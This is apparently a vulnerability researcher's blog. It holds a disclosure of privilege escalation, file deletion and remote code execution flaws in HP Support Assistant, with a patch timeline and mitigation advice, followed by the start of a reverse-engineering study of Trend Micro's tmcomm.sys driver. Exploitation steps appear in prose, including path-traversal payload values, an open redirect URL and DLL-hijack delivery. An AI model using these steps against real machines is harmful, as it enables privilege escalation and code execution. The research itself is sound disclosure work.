An unpatched bug, just what we wanted. We can test the open redirect vulnerability by going to a URL like https://ers.rssx.hp.com/ers/redirect?targetUrl=https://google.com and landing on Google, thanks TvM and HP negligence (it's been 5 months since I re-reported this open redirect bug and it's still unpatched)!

Back to the method, this open redirect bug is on the host ers.rssx.hp.com which does end in .hp.com making it a perfect candidate for an attack. We can redirect to our own web server where the file is stored to make the method download any file we want.

The next barrier is being able to place the file where we want. This is pretty simple, because HP didn’t do safe path string concatenation. We can just set the action item base ExecutableName property to be a relative path such as ../../something allowing us to easily control the download location.

We don’t have to worry about MD5 verification if we just pass something other than "PrinterDriver" for the ActionType property.

The final check is the verification of the downloaded file’s signature. Let’s quickly look review the method.

Several Critical Vulnerabilities on most HP machines running Windows
Several Critical Vulnerabilities on most HP machines running Windows
If the file is not signed and the shouldDelete argument is true, the method will delete the downloaded file and return that the download failed.

The shouldDelete argument is the first argument passed to the VerifyDownloadSignature method. I didn’t want to spoil it in discovery, but this is hilarious because as you can see in the picture above, the first argument to VerifyDownloadSignature is always false. This means that even if the downloaded file fails signature verification, since shouldDelete is always false, the file won’t be deleted. I really don’t know how to explain this one… did an HP Developer just have a brain fart? Whatever the reason, it made my life a whole lot easier.

At the end of the day, we can place any file anywhere we want in the context of a SYSTEM process allowing for escalation of privileges.

Discovery: Local Privilege Escalation #5

The next protected method we’ll be looking at is CreateInstantTask. For our purposes, this is a pretty simple function to review.

The method takes in three arguments. The String parameter updatePath which represents the path to the update binary, the name of the update, and the arguments to pass to the update binary.

The first verification step is checking the path of the update binary.

Several Critical Vulnerabilities on most HP machines running Windows

This verification method will first ensure that the update path is an absolute path that does not lead to a junction or reparse point. Good job on HP for checking this.

The next check is that the update path "starts with" a whitelisted base path. For my 64-bit machine, MainAppPath expands to C:\Program Files (x86)\Hewlett Packard\HP Support Framework and FrameworkPath expands to C:\Program Files (x86)\Hewlett Packard\HP Support Solutions.

What this check essentially means is that since our path has to be absolute AND it must start with a path to HP’s Program Files directory. The update path must actually be in their installation folder.

The final verification step is ensuring that the update path points to a binary signed by HP.

If all of these checks pass, the method creates a Task Scheduler task to be executed immediately by an Administrator. If any Administrator is logged on, the binary is immediately executed.

Exploitation: Local Privilege Escalation #5

A tricky one. Our update path must be something in HP’s folders, but what could that be? This stumped me for a while, but I got a spark of an idea while brainstorming.

We have the ability to start ANY program in HP’s installation folder with ANY arguments, interesting. What types of binaries does HP’s installation folders have? Are any of them interesting?

I found a few interesting binaries in the whitelisted directories such as Extract.exe and unzip.exe. On older versions, we could use unzip.exe, but a new update implements a signature check. Extract.exe didn’t even work when I tried to use it normally. I peeked at several binaries in dnSpy and I found an interesting one, HPSF_Utils.exe.

When the binary was started with the argument "encrypt" or "decrypt", the method below would be executed.

Several Critical Vulnerabilities on most HP machines running Windows

If we passed "encrypt" as the first argument, the method would take the second argument, read it in and encrypt it, then write it to the file specified at the third argument. If we passed "decrypt", it would do the same thing except read in an encrypted file and write the decrypted version to the third argument path.

If you haven’t caught on to why this is useful, the reason it’s so useful is because we can abuse the decrypt functionality to write our malicious file to anywhere in the system, easily allowing us to escalate privileges. Since this binary is in the whitelisted path, we can execute it and abuse it to gain Administrator because we can write anything to anywhere.

Arbitrary File Deletion Vulnerabilities

Discovery: Arbitrary File Deletion

Let’s start with some arbitrary file deletion vulnerabilities. Although file deletion probably won’t lead to Local Privilege Escalation, I felt that it was serious enough to report because I could seriously mess up a victim’s machine by abusing HP’s software.

The protected method we’ll be looking at is LogSoftPaqResults. This method is very short for our purposes, all we need to read are the first few lines.

Several Critical Vulnerabilities on most HP machines running Windows

When the method is called, it will combine the temporary path C:\Windows\TEMP and the ExecutableName from the untrusted action item base using an unsafe string concatenation. If the file at this path exists AND it is not signed by HP, it will go ahead and delete it.

Exploitation: Arbitrary File Deletion #1

This is a pretty simple bug. Since HP uses unsafe string concatenation on path strings, we can just escape out of the C:\Windows\TEMP directory via relative path escapes (i.e ../) to reach any file we want.

If that file exists and isn’t signed by HP, the method which is running in the context of a SYSTEM process will delete that file. This is pretty serious because imagine if I ran this on the entirety of your system32 folder. That would definitely not be good for your computer.

Exploitation: Arbitrary File Deletion #2

This bug was even simpler than the last one, so I decided not to create a dedicated discovery section. Let’s jump into the past and look at the protected method UncompressCabFile.
When the method starts, as we reviewed before, the following is checked:

  1. cabFilePath (path to the cabinet file to extract) exists.
  2. cabFilePath is signed by HP.
  3. Our token is "trusted" and the cabFilePath contains a few pre-defined paths.

If these conditions are not met, the method will delete the file specified by cabFilePath.

If we want to delete a file, all we need to do is specify pretty much any path in the cabFilePath argument and let the method delete it while running as the SYSTEM user.

Remote Code Execution Vulnerability

Discovery

For most of this report we’ve reviewed vulnerabilities inside the HP service. In this section, we’ll explore a different HP binary. The methods reviewed in "General Exploitation" will not apply to this bug.

When I was looking for attack surfaces for Remote Code Execution, one of the first things I checked was for registered URL Protocols. Although I could find these manually in regedit, I opted to use the tool URLProtocolView. This neat tool will allow us to easily enumerate the existing registered URL Protocols and what command line they execute.

Scrolling down to "hp" after sorting by name showed quite a few options.

Several Critical Vulnerabilities on most HP machines running Windows

The first one looked mildly interesting because the product name of the binary was "HP Download and Install Assistant", could this assist me in achieving Remote Code Execution? Let’s pop it open in dnSpy.

The first thing the program does is throw the passed command line arguments into its custom argument parser. Here are the arguments we can pass into this program:

  1. remotefile = The URL of a remote file to download.
  2. filetitle = The name of the file downloaded.
  3. source = The "launch point" or the source of the launch.
  4. caller = The calling process name.
  5. cc = The country used for localization.
  6. lc = The language used for localization.

After parsing out the arguments, the program starts creating a "download request". The method will read the download history to see if the file was already downloaded. If it wasn’t downloaded before, the method adds the download request into the download requests XML file.

After creating the request, the program will "process" the XML data from the history file. For every pending download request, the method will create a downloader.

During this creation is when the first integrity checks are done. The constructor for the downloader first extracts the filename specified in the remotefile argument. It parses the name out by finding the last index of the character / in the remotefile argument and then taking the substring starting from that index to the end of the string. For example, if we passed in https://example.com/test.txt for the remote file, the method would parse out text.txt.

If the file name contains a period, verification on the extension begins. First, the method parses the file extension by getting everything after the last period in the name. If the extension is exe, msi, msp, msu, or p2 then the download is marked as an installer. Otherwise, the extension must be one of 70 other whitelisted extensions. If the extension is not one of those, the download is cancelled.

After verifying the file extension, the complete file path is created.

Several Critical Vulnerabilities on most HP machines running Windows

First, if the lc argument is ar (Arabic), he (Hebrew), ru (Russian), zh (Chinese), ko (Korean), th (Thai), or ja (Japanese), your file name is just the name extracted from the URL. Otherwise, your file name is the filetitle argument, , and the file name from the URL combined. Finally, the method will replace any invalid characters present in Path.GetInvalidFileNameChars with a space.

This sanitized file name is then combined with the current user's download folder + HP Downloads.

The next relevant step is for the download to begin, this is where the second integrity check is. First, the remote file URL argument must begin with https. Next, a URI object is created for the remote file URL. The host of this URI must end with .hp.com or end with .hpicorp.net. Only if these checks are passed is the download started.

Once the download has finished, another check is done. Before the download is marked as downloaded, the program verifies the downloaded content. This is done by first checking if the download is an installer, which was set during the file name parsing stage. If the download is an installer then the method will verify the certificate of the downloaded file. If the file is not an installer, no check is done.

Several Critical Vulnerabilities on most HP machines running Windows

The first step of verifying the certificate of the file is to check that it matches the binary. The method does this by calling WinVerifyTrust on the binary. The method does not care if the certificate is revoked. The next check is extracting the subject of the certificate. This subject field must contain in any case hewlett-packard, hewlett packard, or o=hp inc.

When the client presses the open or install button on the form, this same check is done again, and then the file is started using C#’s Process.Start. There are no arguments passed.

Exploitation

There are several ways to approaching exploiting this program. In the next sections, I’ll be showing different variants of attacking and the pros/cons of each one. Let’s start by bypassing a check we need to get past for any variant, the URL check.

As we just reviewed, the remote URL passed must have a host that ends with .hp.com or .hpicorp.net. This is tricky because the verification method uses the safe and secure way of verifying the URL’s host by first using C#’s URI parser. Our host will really need to contain .hp.com or .hpicorp.net.

A previous vulnerability in this report had the same issue. If you haven't read that section, I would highly recommend it to understand where we got this magical open redirect vulnerability in one of HP's websites: https://ers.rssx.hp.com/ers/redirect?targetUrl=https://google.com.

Back to the verification method, this open redirect bug is on the host ers.rssx.hp.com which does end in .hp.com making it a perfect candidate for an attack. We can redirect to our own web server where we can host any file we want.

This sums up the "general" exploitation portion of the Remote Code Execution bugs. Let’s get into the individual ones.

Remote Code Execution Variant #1

The first way I would approach this seeing what type of file we can have our victim download without the HP program thinking it’s an installer. Only if it’s an installer will the program verify its signature.

Looking at the whitelisted file extensions, we don’t have that much to work with, but we have some options. One whitelisted option is zip, this could work. An ideal attack scenario would be a website telling you need a critical update, the downloader suddenly popping up with the HP logo, the victim pressing open on the zip file and executing a binary inside it.

To have a valid remote file URL, we will need to abuse the open redirect bug. I put my bad file on my web server and just put the URL to the zip file at the end of the open redirect URL.

When the victim visits my malicious website, an iframe with the hpdia:// URL Protocol is loaded and the download begins.

This attack is somewhat lame because it requires two clicks to RCE, but I still think it’s more than a valid attack method since the HP downloader looks pretty legit.

Remote Code Execution Variant #2

My next approach is definitely more interesting then the last. In this method, we first make the program download a DLL file which is NOT an installer, then we install a signed HP binary who depends on this DLL.

Similar to our DLL Hijacking attack in the third Local Privilege Escalation vulnerability, we can use any signed binary which imports a DLL that doesn’t exist. By simply naming our malicious DLL to the missing DLL name, the executed signed program will end up loading our malicious DLL giving us Remote Code Execution.

Here’s the catch. We’re going to have to set the language of the downloader to Arabic, Hebrew, Russian, Chinese, Korean, Thai, or Japanese. The reason is for DLL Hijacking, we need to set our malicious DLL name to exactly that of the missing DLL.

Several Critical Vulnerabilities on most HP machines running Windows

If you recall the CreateLocalFilename method, the actual filename will have in it if the language we pass in through arguments is not one of those languages. If we do pass in a language that’s one of the ones checked for in the function above, the filename will be the filename specified in the remote URL.

If your target victim is in a country where one of these languages is spoken commonly, this is in my opinion the best attack route. Otherwise, it may be a bit of an optimistic approach.

Whenever the victim presses on any of the open or install all buttons, the signed binary will start and load our malicious DLL. If your victim is in an English country or only speaks English, this may be a little more difficult.

You could have the website present a critical update guide telling the visitor what button to press to update their system, but I am not sure if a user is more likely to press a button in a foreign language or open a file in a zip they opened.

At the end of the day, this is a one click only attack method, and it would work phenomenal in a country that uses the mentioned languages. This variant can also be used after detecting the victim’s language and seeing if it’s one of the few languages we can use with this variant. You can see the victim’s language in HTTP headers or just the "navigator language" in javascript.

Remote Code Execution Variant #3

The last variant for achieving remote code execution is a bit optimistic in how much resources the attacker has, but I don’t think it a significant barrier for an APT.

To review, if the extension of the file we’re downloading is considered an installer (see installer extensions in discovery), our binary will be checked for HP’s signature. Let’s take a look at the signature check.

Several Critical Vulnerabilities on most HP machines running Windows

The method takes in a file name and first verifies that it’s a valid certificate. This means a certificate ripped from a legitimate HP binary won’t work because it won’t match the binary. The concerning part is the check for if the certificate is an HP certificate.

To be considered an HP certificate, the subject of the certificate must contain in any case hewlett-packard, hewlett packard, or o=hp inc. This is a pretty inadequate check, especially that lower case conversion. Here are a few example companies I can form that would pass this check:

  1. [something]hewlett PackArd[someting]
  2. HP Inc[something]

I could probably spend days making up company names. All an attacker needs to do is create an organization that contains any of those words and they can get a certificate for that company. Next thing you know, they can have a one click RCE for anyone that has the HP bloatware installed.

Proof of Concept

Local Privilege Escalation Vulnerabilities

Remote Code Execution Vulnerabilities

"Remediation"

HP had their initial patch finished three months after I sent them the report of my findings. When I first heard they were aiming to patch 10 vulnerabilities in such a reasonable time-frame, I was impressed because it appeared like they were being a responsible organization who took security vulnerabilities seriously. This was in contrast to the performance I saw last year with my research into Remote Code Execution in Dell's bloatware where they took 6 months to deliver a patch for a single vulnerability, an absurd amount of time.

In the following section, I'll be going over the vulnerabilities HP did not patch or patched inadequately. Here is an overview of what was actually patched:

  1. Local Privilege Escalation #1 – Patched ✔️
  2. Local Privilege Escalation #2 – Unpatched ❌
  3. Local Privilege Escalation #3 – Unpatched ❌
  4. Local Privilege Escalation #4 – "Patched" 😕 (not really)
  5. Local Privilege Escalation #5 – Unpatched ❌
  6. Arbitrary File Deletion #1 – Patched ✔️
  7. Arbitrary File Deletion #2 – Patched ✔️
  8. Remote Code Execution Variant #1 – Patched ✔️
  9. Remote Code Execution Variant #2 – Patched ✔️
  10. Remote Code Execution Variant #3 – Patched ✔️

Re-Discovery

New Patch, New Vulnerability

The largest change observed is the transition from the hardcoded "C:\Windows\TEMP" temporary directory to relying on the action item base supplied by the client to specify the temporary directory.

I am not sure if HP PSIRT did not review the patch or if HP has a lack of code review in general, but this transition actually introduced a new vulnerability. Now, instead of having a trusted hardcoded string be the deciding factor for the temporary directory… HP relies on untrusted client data (the action item base).

As an attacker, my unprivileged process is what decides the value of the temporary directory used by the elevated agent, not the privileged service process, allowing for simple spoofing. This was one of the more shocking components of the patch. HP had not only left some vulnerabilities unpatched but in doing so ended up making some code worse than it was. This change mostly impacted the Local Privilege Escalation vulnerabilities.

Local Privilege Escalation #2

Looking over the new InstallSoftpaqsSilently method, the primary changes are:

  1. The untrusted ActionItemBase specifies the temporary directory.
  2. There is more insecure path concatenation (path1 + path2 versus C#’s Path.Combine).
  3. There is more verification on the path specified by the temporary directory and executable name (i.e checking for relative path escapes, NTFS reparse points, rooted path, etc).

The core problems that are persistent even after patching:

  1. The path that is executed by the method still utilizes unvalidated untrusted client input. Specifically, the method splits the item property SilentInstallString by double quote and utilizes values from that array for the name of the binary. This binary name is not validated besides a simple check to see if the file exists. No guarantees it isn’t an attacker’s binary.
  2. There is continued use of insecure coding practices involving paths. For example, HP consistently concatenates paths by using the string combination operator versus using a secure concatenation method such as Path.Combine.

In order to have a successful call to InstallSoftpaqsSilently, you must now meet these requirements:

  1. The file specified by the TempDirectory property + ExecutableName property must exist.
  2. The file specified by TempDirectory property + ExecutableName property must be signed by HP.
  3. The path specified by TempDirectory property + ExecutableName property must pass the VerifyHPPath requirements:
    a. The path cannot contain relative path escapes.
    b. The path must be a rooted path.
    c. The path must not be a junction point.
    d. The path must start with HP path.
  4. The SilentInstallString property must contain the SPName property + .exe.
  5. The directory name is the TempDirectory property + swsetup\ + the ExecutableName property with .exe stripped.
  6. The Executable Name is specified in the SilentInstallString property split by double quote. If the split has a size greater than 1, it will take the second element as EXE Name, else the first element.
  7. The Executable Name must not contain .exe or .msi, otherwise, the Directory Name + \ + the Executable Name must exist.
  8. The function executes the binary specified at Directory Name + \ + Executable Name.

The core point of attack is outlined in step 6 and 7. We can control the Executable Name by formulating a malicious payload for the SilentInstallString item property that escapes a legitimate directory passed in the TempDirectory property into an attacker controlled directory.

For example, if we pass:

  1. C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\ for the TempDirectory property.
  2. HPSF.exe for the the ExecutableName property.
  3. malware for the SPName property.
  4. "..\..\..\..\..\Malware\malware.exe (quote at beginning intentional) for the SilentInstallString property.

The service will execute the binary at C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\swsetup\HPSF\..\..\..\..\..\Malware\malware.exe which ends up resolving to C:\Malware\malware.exe thus executing the attacker controlled binary as SYSTEM.

Local Privilege Escalation #3

The primary changes for the new InstallSoftpaqsDirectly method are:

  1. The untrusted ActionItemBase specifies the temporary directory.
  2. Invalid binaries are no longer deleted.

The only thing we need to change in our proof of concept is to provide our own TempDirectory path. That’s… it.

Local Privilege Escalation #4

For the new DownloadSoftpaq method, the primary changes are:

  1. The download URL cannot have query parameters.

The core problems that are persistent even after patching:

  1. Insecure validation of the download URL.
  2. Insecure validation of the downloaded binary.
  3. Open Redirect bug on ers.rssx.hp.com.

First of all, HP still only does a basic check on the hostname to ensure it ends with a whitelisted host, however, this does not address the core issue that this check in itself is insecure.

Simply checking hostname exposes attacks from Man-in-the-Middle attacks, other Open Redirect vulnerabilities, and virtual host based attacks (i.e a subdomain that redirects to 127.0.0.1).

For an unknown reason, HP still does not delete the binary downloaded if it does not have an HP signature because HP passes the constant false for the parameter that indicates whether or not to delete a bad binary.

At the end of the day, this is still a patched vulnerability since at this time you can’t quite exploit it, but I wouldn’t be surprised to see this exploited in the future.

Local Privilege Escalation #5

This vulnerability was completed untouched. Not much more to say about it.

Timeline

Here is a timeline of HP's response:

10/05/2019 - Initial report of vulnerabilities sent to HP.
10/08/2019 - HP PSIRT acknowledges receipt and creates a case.
12/19/2019 - HP PSIRT pushes an update and claims to have "resolved the issues reported".
01/01/2020 - Updated report of unpatched vulnerabilities sent to HP.
01/06/2020 - HP PSIRT acknowledges receipt.
02/05/2020 - HP PSIRT schedules a new patch for the first week of March.
03/09/2020 - HP PSIRT pushes the scheduled patch to 03/21/2020 due to Novel Coronavirus complications.

Protecting your machine

If you're wondering what you need to do to ensure your HP machine is safe from these vulnerabilities, it is critical to ensure that it is up to date or removed. By default, HP Support Assistant does not have automatic updating by default unless you explicitly opt-in (HP claims otherwise).

It is important to note that because HP has not patched three local privilege escalation vulnerabilities, even if you have the latest version of the software, you are still vulnerable unless you completely remove the agent from your machine (Option 1).

Option 1: Uninstall

The best mitigation to protect against the attacks described in this article and future vulnerabilities is to remove the software entirely. This may not be an option for everyone, especially if you rely on the updating functionality the software provides, however, removing the software ensures that you're safe from any other vulnerabilities that may exist in the application.

For most Windows installations, you can use the "Add or remove programs" component of the Windows control panel to uninstall the service. There are two pieces of software to uninstall, one is called "HP Support Assistant" and the other is called "HP Support Solutions Framework".

Option 2: Update

The next best option is to update the agent to the latest version. The latest update fixes several vulnerabilities discussed except for three local privilege escalation vulnerabilities.

There are two ways to update the application, the recommended method is by opening "HP Support Assistant" from the Start menu, click "About" in the top right, and pressing "Check for latest version". Another method of updating is to install the latest version from HP's website here.

How to use Trend Micro's Rootkit Remover to Install a Rootkit

18 May 2020 at 15:32
How to use Trend Micro's Rootkit Remover to Install a Rootkit

The opinions expressed in this publication are those of the authors. They do not reflect the opinions or views of my employer. All research was conducted independently.

For a recent project, I had to do research into methods rootkits are detected and the most effective measures to catch them when I asked the question, what are some existing solutions to rootkits and how do they function? My search eventually landed me on the TrendMicro RootkitBuster which describes itself as "A free tool that scans hidden files, registry entries, processes, drivers, and the master boot record (MBR) to identify and remove rootkits".

The features it boasted certainly caught my attention. They were claiming to detect several techniques rootkits use to burrow themselves into a machine, but how does it work under the hood and can we abuse it? I decided to find out by reverse engineering core components of the application itself, leading me down a rabbit hole of code that scarred me permanently, to say the least.

Discovery

Starting the adventure, launching the application resulted in a fancy warning by Process Hacker that a new driver had been installed.

How to use Trend Micro's Rootkit Remover to Install a Rootkit

Already off to a good start, we got a copy of Trend Micro's "common driver", this was definitely something to look into. Besides this driver being installed, this friendly window opened prompting me to accept Trend Micro's user agreement.

How to use Trend Micro's Rootkit Remover to Install a Rootkit

I wasn't in the mood to sign away my soul to the devil just yet, especially since the terms included a clause stating "You agree not to attempt to reverse engineer, decompile, modify, translate, disassemble, discover the source code of, or create derivative works from...".

Thankfully, Trend Micro already deployed their software on to my machine before I accepted any terms. Funnily enough, when I tried to exit the process by right-clicking on the application and pressing "Close Window", it completely evaded the license agreement and went to the main screen of the scanner, even though I had selected the "I do not accept the terms of the license agreement" option. Thanks Trend Micro!

How to use Trend Micro's Rootkit Remover to Install a Rootkit

I noticed a quick command prompt flash when I started the application. It turns out this was the result of a 7-Zip Self Extracting binary which extracted the rest of the application components to %TEMP%\RootkitBuster.

How to use Trend Micro's Rootkit Remover to Install a Rootkit

Let's review the driver we'll be covering in this article.

  • The tmcomm driver which was labeled as the "TrendMicro Common Module" and "Trend Micro Eyes". A quick overlook of the driver indicated that it accepted communication from privileged user-mode applications and performed common actions that are not specific to the Rootkit Remover itself. This driver is not only used in the Rootkit Buster and is implemented throughout Trend Micro's product line.

In the following sections, we'll be deep diving into the tmcomm driver . We'll focus our research into finding different ways to abuse the driver's functionality, with the end goal being able to execute kernel code. I decided not to look into the tmrkb.sys because although I am sure it is vulnerable, it seems to only be used for the Rootkit Buster.

TrendMicro Common Module (tmcomm.sys)

Let's begin our adventure with the base driver that appears to be used not only for this Rootkit Remover utility, but several other Trend Micro products as well. As I stated in the previous section, a very brief look-over of the driver revealed that it does allow for communication from privileged user-mode applications.

How to use Trend Micro's Rootkit Remover to Install a Rootkit

One of the first actions the driver takes is to create a device to accept IOCTL communication from user-mode. The driver creates a device at the path \Device\TmComm and a symbolic link to the device at \DosDevices\TmComm (accessible via \\.\Global\TmComm). The driver entrypoint initializes a significant amount of classes and structure used throughout the driver, however, for our purposes, it is not necessary to cover each one.

I was happy to see that Trend Micro made the correct decision of restricting their device to the SYSTEM user and Administrators. This meant that even if we did find exploitable code, because any communication would require at least Administrative privileges, a significant amount of the industry would not consider it a vulnerability. For example, Microsoft themselves do not consider Administrator to Kernel to be a security boundary because of the significant amount of access they get. This does not mean however exploitable code in Trend Micro's drivers won't be useful.

How to use Trend Micro's Rootkit Remover to Install a Rootkit

TrueApi

A large component of the driver is its "TrueApi" class which is instantiated during the driver's entrypoint. The class contains pointers to imported functions that get used throughout the driver. Here is a reversed structure:

struct TrueApi
{
	BYTE Initialized;
	PVOID ZwQuerySystemInformation;
	PVOID ZwCreateFile;
	PVOID unk1; // Initialized as NULL.
	PVOID ZwQueryDirectoryFile;
	PVOID ZwClose;
	PVOID ZwOpenDirectoryObjectWrapper;
	PVOID ZwQueryDirectoryObject;
	PVOID ZwDuplicateObject;
	PVOID unk2; // Initialized as NULL.
	PVOID ZwOpenKey;
	PVOID ZwEnumerateKey;
	PVOID ZwEnumerateValueKey;
	PVOID ZwCreateKey;
	PVOID ZwQueryValueKey;
	PVOID ZwQueryKey;
	PVOID ZwDeleteKey;
	PVOID ZwTerminateProcess;
	PVOID ZwOpenProcess;
	PVOID ZwSetValueKey;
	PVOID ZwDeleteValueKey;
	PVOID ZwCreateSection;
	PVOID ZwQueryInformationFile;
	PVOID ZwSetInformationFile;
	PVOID ZwMapViewOfSection;
	PVOID ZwUnmapViewOfSection;
	PVOID ZwReadFile;
	PVOID ZwWriteFile;
	PVOID ZwQuerySecurityObject;
	PVOID unk3; // Initialized as NULL.
	PVOID unk4; // Initialized as NULL.
	PVOID ZwSetSecurityObject;
};

Looking at the code, the TrueApi is primarily used as an alternative to calling the functions directly. My educated guess is that Trend Micro is caching these imported functions at initialization to evade delayed IAT hooks. Since the TrueApi is resolved by looking at the import table however, if there is a rootkit that hooks the IAT on driver load, this mechanism is useless.

XrayApi

Similar to the TrueApi, the XrayApi is another major class in the driver. This class is used to access several low-level devices and to interact directly with the filesystem. A major component of the XrayConfig is its "config". Here is a partially reverse-engineered structure representing the config data:

struct XrayConfigData
{
	WORD Size;
	CHAR pad1[2];
	DWORD SystemBuildNumber;
	DWORD UnkOffset1;
	DWORD UnkOffset2;
	DWORD UnkOffset3;
	CHAR pad2[4];
	PVOID NotificationEntryIdentifier;
	PVOID NtoskrnlBase;
	PVOID IopRootDeviceNode;
	PVOID PpDevNodeLockTree;
	PVOID ExInitializeNPagedLookasideListInternal;
	PVOID ExDeleteNPagedLookasideList;
	CHAR unkpad3[16];
	PVOID KeAcquireInStackQueuedSpinLockAtDpcLevel;
	PVOID KeReleaseInStackQueuedSpinLockFromDpcLevel;
	...
};

The config data stores the location of internal/undocumented variables in the Windows Kernel such as the IopRootDeviceNode, PpDevNodeLockTree, ExInitializeNPagedLookasideListInternal, and ExDeleteNPagedLookasideList.  My educated guess for the purpose of this class is to access low-level devices directly rather than use documented methods which could be hijacked.

IOCTL Requests

Before we get into what the driver allows us to do, we need to understand how IOCTL requests are handled.

In the primary dispatch function, the Trend Micro driver converts the data alongside a IRP_MJ_DEVICE_CONTROL request to a proprietary structure I call a TmIoctlRequest.

struct TmIoctlRequest
{
	DWORD InputSize;
	DWORD OutputSize;
	PVOID UserInputBuffer;
	PVOID UserOutputBuffer;
	PVOID Unused;
	DWORD_PTR* BytesWritten;
};

The way Trend Micro organized dispatching of IOCTL requests is by having several "dispatch tables". The "base dispatch table" simply contains an IOCTL Code and a corresponding "sub dispatch function". For example, when you send an IOCTL request with the code 0xDEADBEEF, it will compare each entry of this base dispatch table and pass along the data if there is a table entry that has the matching code. A base table entry can be represented by the structure below:

typedef NTSTATUS (__fastcall *DispatchFunction_t)(TmIoctlRequest *IoctlRequest);

struct BaseDispatchTableEntry
{
	DWORD_PTR IOCode;
	DispatchFunction_t DispatchFunction;
};

After the DispatchFunction is called, it typically verifies some of the data provided ranging from basic nullptr checks to checking the size of the input and out buffers. These "sub dispatch functions" then do another lookup based on a code passed in the user input buffer to find the corresponding "sub table entry". A sub table entry can be represented by the structure below:

typedef NTSTATUS (__fastcall *OperationFunction_t)(PVOID InputBuffer, PVOID OutputBuffer);

struct SubDispatchTableEntry
{
	DWORD64 OperationCode;
	OperationFunction_t PrimaryRoutine;
	OperationFunction_t ValidatorRoutine;
};

Before calling the PrimaryRoutine, which actually performs the requested action, the sub dispatch function calls the ValidatorRoutine. This routine does "action-specific" validation on the input buffer, meaning that it performs checks on the data the PrimaryRoutine will be using. Only if the ValidatorRoutine returns successfully will the PrimaryRoutine be called.

Now that we have a basic understanding of how IOCTL requests are handled, let's explore what they allow us to do. Referring back to the definition of the "base dispatch table", which stores "sub dispatch functions", let's explore each base table entry and figure out what each sub dispatch table allows us to do!

IoControlCode == 9000402Bh

Discovery

This first dispatch table appears to interact with the filesystem, but what does that actually mean? To start things off, the code for the "sub dispatch table" entry is obtained by dereferencing a DWORD from the start of the input buffer. This means that to specify which sub dispatch entry you'd like to execute, you simply need to set a DWORD at the base of the input buffer to correspond with that entries' **OperationCode**.

To make our lives easier, Trend Micro conveniently included a significant amount of debugging strings, often giving an idea of what a function does. Here is a table of the functions I reversed in this sub dispatch table and what they allow us to do.

OperationCode PrimaryRoutine Description
2713h IoControlCreateFile Calls NtCreateFile, all parameters are controlled by the request.
2711h IoControlFindNextFile Returns STATUS_NOT_SUPPORTED.
2710h IoControlFindFirstFile Performs nothing, returns STATUS_SUCCESS always.
2712h IoControlFindCloseFile Calls ZwClose, all parameters are controlled by the request.
2715h IoControlReadFileIRPNoCache References a FileObject using HANDLE from request. Calls IofCallDriver and reads result.
2714h IoControlCreateFileIRP Creates a new FileObject and associates DeviceObject for requested drive.
2716h IoControlDeleteFileIRP Deletes a file by sending an IRP_MJ_SET_INFORMATION request.
2717h IoControlGetFileSizeIRP Queries a file's size by sending an IRP_MJ_QUERY_INFORMATION request.
2718h IoControlSetFilePosIRP Set's a file's position by sending an IRP_MJ_SET_INFORMATION request.
2719h IoControlFindFirstFileIRP Returns STATUS_NOT_SUPPORTED.
271Ah IoControlFindNextFileIRP Returns STATUS_NOT_SUPPORTED.
2720h IoControlQueryFile Calls NtQueryInformationFile, all parameters are controlled by the request.
2721h IoControlSetInformationFile Calls NtSetInformationFile, all parameters are controlled by the request.
2722h IoControlCreateFileOplock Creates an Oplock via IoCreateFileEx and other filesystem API.
2723h IoControlGetFileSecurity Calls NtCreateFile and then ZwQuerySecurityObject. All parameters are controlled by the request.
2724h IoControlSetFileSecurity Calls NtCreateFile and then ZwSetSecurityObject. All parameters are controlled by the request.
2725h IoControlQueryExclusiveHandle Check if a file is opened exclusively.
2726h IoControlCloseExclusiveHandle Forcefully close a file handle.

IoControlCode == 90004027h

Discovery

This dispatch table is primarily used to control the driver's process scanning features. Many functions in this sub dispatch table use a separate scanning thread to synchronously search for processes via various methods both documented and undocumented.

OperationCode PrimaryRoutine Description
C350h GetProcessesAllMethods Find processes via ZwQuerySystemInformation and WorkingSetExpansionLinks.
C351h DeleteTaskResults* Delete results obtained through other functions like GetProcessesAllMethods.
C358h GetTaskBasicResults* Further parse results obtained through other functions like GetProcessesAllMethods.
C35Dh GetTaskFullResults* Completely parse results obtained through other functions like GetProcessesAllMethods.
C360h IsSupportedSystem Returns TRUE if the system is "supported" (whether or not they have hardcoded offsets for your build).
C361h TryToStopTmComm Attempt to stop the driver.
C362h GetProcessesViaMethod Find processes via a specified method.
C371h CheckDeviceStackIntegrity Check for tampering on devices associated with physical drives.
C375h ShouldRequireOplock Returns TRUE if oplocks should be used for certain scans.

These IOCTLs revolve around a few structures I call "MicroTask" and "MicroScan". Here are the structures reverse-engineered:

struct MicroTaskVtable
{
	PVOID Constructor;
	PVOID NewNode;
	PVOID DeleteNode;
	PVOID Insert;
	PVOID InsertAfter;
	PVOID InsertBefore;
	PVOID First;
	PVOID Next;
	PVOID Remove;
	PVOID RemoveHead;
	PVOID RemoveTail;
	PVOID unk2;
	PVOID IsEmpty;
};

struct MicroTask
{
	MicroTaskVtable* vtable;
	PVOID self1; // ptr to itself.
	PVOID self2; // ptr to itself.
	DWORD_PTR unk1;
	PVOID MemoryAllocator;
	PVOID CurrentListItem;
	PVOID PreviousListItem;
	DWORD ListSize;
	DWORD unk4; // Initialized as NULL.
	char ListName[50];
};

struct MicroScanVtable
{
	PVOID Constructor;
	PVOID GetTask;
};

struct MicroScan
{
	MicroScanVtable* vtable;
	DWORD Tag; // Always 'PANS'.
	char pad1[4];
	DWORD64 TasksSize;
	MicroTask Tasks[4];
};

For most of the IOCTLs in this sub dispatch table, a MicroScan is passed in by the client which the driver populates. We'll look into how we can abuse this trust in the next section.

Exploitation

When I was initially reverse engineering the functions in this sub dispatch table, I was quite confused because the code "didn't seem right". It appeared like the MicroScan kernel pointer returned by functions such as GetProcessesAllMethods was being directly passed onto other functions such as DeleteTaskResults by the client. These functions would then take this untrusted kernel pointer and with almost no validation call functions in the virtual function table specified at the base of the class.

How to use Trend Micro's Rootkit Remover to Install a Rootkit

Taking a look at the "validation routine" for the DeleteTaskResults sub dispatch table entry, the only validation performed on the MicroScan instance specified at the input buffer + 0x10 was making sure it was a valid kernel address.

How to use Trend Micro's Rootkit Remover to Install a Rootkit
How to use Trend Micro's Rootkit Remover to Install a Rootkit
How to use Trend Micro's Rootkit Remover to Install a Rootkit

The only other check besides making sure that the supplied pointer was in kernel memory was a simple check in DeleteTaskResults to make sure the Tag member of the MicroScan is PANS.

How to use Trend Micro's Rootkit Remover to Install a Rootkit

